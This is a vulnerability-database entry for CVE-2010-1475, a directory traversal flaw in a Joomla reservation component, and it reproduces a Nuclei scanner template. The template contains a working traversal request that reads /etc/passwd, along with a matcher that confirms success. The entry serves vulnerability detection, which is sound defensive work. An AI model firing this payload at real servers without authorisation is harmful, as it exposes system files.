Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1475
HistoryAug 23, 2021 - 11:14 p.m.

Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion

2021-08-2323:14:16
ProjectDiscovery
github.com
4

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

6.1 Medium

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.6%

A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1475

info:
  name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    The LFI vulnerability can allow an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.
  remediation: |
    Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12147
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1475
    - http://www.exploit-db.com/exploits/12147
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1475
    cwe-id: CWE-22
    epss-score: 0.01242
    epss-percentile: 0.85468
    cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ternaria
    product: com_preventive
  tags: cve,cve2010,edb,joomla,lfi,ternaria

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205844fcb24ca826bfe720aa9c1f799ffcca234c2c4a537d6d4056f28e3425dd98022100af243d3db9445e19d89159b5af1a765b069d2b807e3e48c98cfb3b27424fd806:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

6.1 Medium

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.6%

Related for NUCLEI:CVE-2010-1475